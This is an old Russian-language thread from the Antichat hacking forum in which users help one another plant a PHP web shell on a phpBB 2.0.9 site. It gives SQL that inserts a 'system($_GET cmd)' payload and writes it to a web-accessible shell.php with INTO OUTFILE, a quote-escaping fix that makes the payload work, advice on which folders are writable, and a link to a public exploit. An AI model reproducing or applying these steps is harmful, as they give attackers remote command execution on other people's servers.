Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Заливка шелла в phpBB 2.0.9 через SQL |
05.06.2006, 13:29
|
|
Познающий
Регистрация: 02.06.2006
Сообщений: 66
Провел на форуме:
870911
Репутация:
69
|
|
Заливка шелла в phpBB 2.0.9 через SQL
Почему вылетает такая ошибка при востонавлениие БД. Что можно сделать.
Error importing backup file DEBUG MODE SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'cmd']); ?>', '10')' at line 1 INSERT INTO phpbb_categories (cat_id, cat_title, cat_order) VALUES('1', '', '10') Line : 980 File : /home/xxxxx/public_html/forum/admin/admin_db_utilities.php
|
|
|
05.06.2006, 13:34
|
|
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814
Репутация:
3876
|
|
'cmd']); ?> - это что такое?)) шелл напоминает наполовину)
смотри таблицу phpbb_categories. Смотри значения таблицы..скорее всего в ней дело. точно не знаю.
|
|
|
|
05.06.2006, 13:49
|
|
Познающий
Регистрация: 02.06.2006
Сообщений: 66
Провел на форуме:
870911
Репутация:
69
|
|
Сообщение от Rebz
'cmd']); ?> - это что такое?)) шелл напоминает наполовину)
Да не это ошибка так вылетает:
Писал всё правильно.
INSERT INTO phpbb_categories (cat_id, cat_title, cat_order) VALUES('1', '<? system(GET['cmd']); ?>', '10');
Потом:
SELECT cat_title INTO OUTFILE '/home/xxxx/public_html/forum/cache/shell.php' FROM phpbb_categories where cat_id=1;
Не пойму чо за хрень такая...
смотри таблицу phpbb_categories. Смотри значения таблицы..скорее всего в ней дело. точно не знаю.
Нет таблица стандартная.
Последний раз редактировалось bandera; 05.06.2006 в 13:52..
|
|
|
|
05.06.2006, 13:54
|
|
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
Провел на форуме:
19975136
Репутация:
4536
|
|
INSERT INTO phpbb_categories (cat_id, cat_title, cat_order) VALUES('1', '<? system(GET['cmd']); ?>', '10');
Говорят если ковычки заслешировать - поможет.
<? system(GET[\'cmd\']); ?>
|
|
|
|
05.06.2006, 14:06
|
|
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
Провел на форуме:
19975136
Репутация:
4536
|
|
Ну дальше то что? Заслешировать то все равно надо.
Запрос к мускулу идет не правильный, хоть отедльный запрос, хоть востановление из бэкапа.
|
|
|
|
05.06.2006, 14:10
|
|
Познающий
Регистрация: 02.06.2006
Сообщений: 66
Провел на форуме:
870911
Репутация:
69
|
|
Green_Bear сэнкс помогло=)
Теперь другая проблема - какая папка ещё может быть доступна для записи? А то Access denied =)
Последний раз редактировалось bandera; 05.06.2006 в 14:17..
|
|
|
|
05.06.2006, 14:20
|
|
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
Провел на форуме:
19975136
Репутация:
4536
|
|
images/avatars/
|
|
|
|
05.06.2006, 14:33
|
|
Познающий
Регистрация: 02.06.2006
Сообщений: 66
Провел на форуме:
870911
Репутация:
69
|
|
Сообщение от Green_Bear
images/avatars/
не некатит (странно чо за хрень) ещё может что нибудь быть?
Последний раз редактировалось bandera; 05.06.2006 в 14:47..
|
|
|
|
05.06.2006, 14:36
|
|
Познающий
Регистрация: 02.06.2006
Сообщений: 66
Провел на форуме:
870911
Репутация:
69
|
|
Вопрос вот по этому сплойту для пхпбб <2.0.10:
http://milw0rm.com/id.php?id=647
его исправлять надо или что, а то у меня лампочка на модеме не моргнула даже, а он пишет cant connect.
Последний раз редактировалось bandera; 05.06.2006 в 14:43..
|
|
|
|
06.06.2006, 14:43
|
|
Постоянный
Регистрация: 18.06.2005
Сообщений: 872
Провел на форуме:
3007945
Репутация:
765
|
|
images/avatars/ это папка доступна для записи просто это папка стоит на фильтрации зависимо от типа файлов и размера.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
